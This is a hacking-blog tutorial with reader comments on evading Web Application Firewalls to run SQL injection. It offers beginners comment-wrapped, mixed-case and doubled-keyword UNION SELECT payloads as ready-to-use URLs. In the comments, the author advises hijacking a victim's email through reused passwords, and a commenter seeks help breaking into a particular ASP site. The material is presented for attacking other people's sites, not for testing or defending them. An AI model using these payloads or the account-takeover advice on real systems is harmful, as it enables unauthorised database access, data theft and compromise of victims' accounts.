You can read them from here.
WAF stands for Web Application Firewall. In order to prevent the attacks such as SQLi and XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.
How it works??
When the WAF detects malicious attempts, our input URL gives a forbidden error as shown in the following figure.
Our aim is to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF. In this tutorial, i am going to show you some basic methods. These methods are especially for beginners.
Methods To Bypass WAF
Comments :-
Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.
Actual query
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—
http://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—
Capitalization Of Functions:-
Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.
Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Replaced Keywords:-
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to bypass the WAFhttp://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
Hope you liked this article. Feel free to leave your comments for further doubts and clarifications.
About the Guest Author:This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me
this website r really interesting..can u write about how to bypass those annoying survey next time..hope u can help
REPLYFantastic Articles by Srinivas... I am being a fan of you.
REPLYHi srinivas,
REPLYyour articles are almost fantastic.But i would like to know is there any way that we can hack Blogs (Like blogspot and Wordpress) with hacking the email addresses of respective blogs
@Good boy
Bro the articles i am writing are applicable to websites having independent databases. Blogger is under google :)
So these methods wont work there.
BTW if your victim is using the same id and password for both blogger and his personal email id, you can hack it.For that, Just follow the methods used for email attacks.
@Anonymous
BYPASSING SURVEYS
we will write the one soon..
keep on visiting hackaholic.. :)
@Anonymous
Fantastic Articles by Srinivas... I am being a fan of you
Thank you and keep visiting for more and more stuff.. :)
Srinivas good tutorial, am from AP too !
REPLYwhat about .aspx site there i did not found vulnerable id this site link is like "login.aspx " like this so please share how i can start to this site
REPLYthanks
CAN U give some more ways of how to BYPASS WAF??
REPLYmr.srinivas i thank you for this explanation
REPLYand i want to ask you
that i have a site this site using asp
i try to but ' at the end of url but when i hit enter the site redirect me to the page that named noaccess.php and print a text "Access Denied" i try to bypass that by adding a false statement like that :
http://www.vicitmesite.com/scriptfolder/view.asp?id=4%20ANandD%201=2
and i have this error :
Server Error
500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.
but i notice here there is no redirect ,, i still on the same page view.asp
how can i bypassing this
and thanks you again
mr.srinivas please reply i'm waiting !!!!!!!!!!!!!!
REPLYUse the form below to comment. No spam please!!!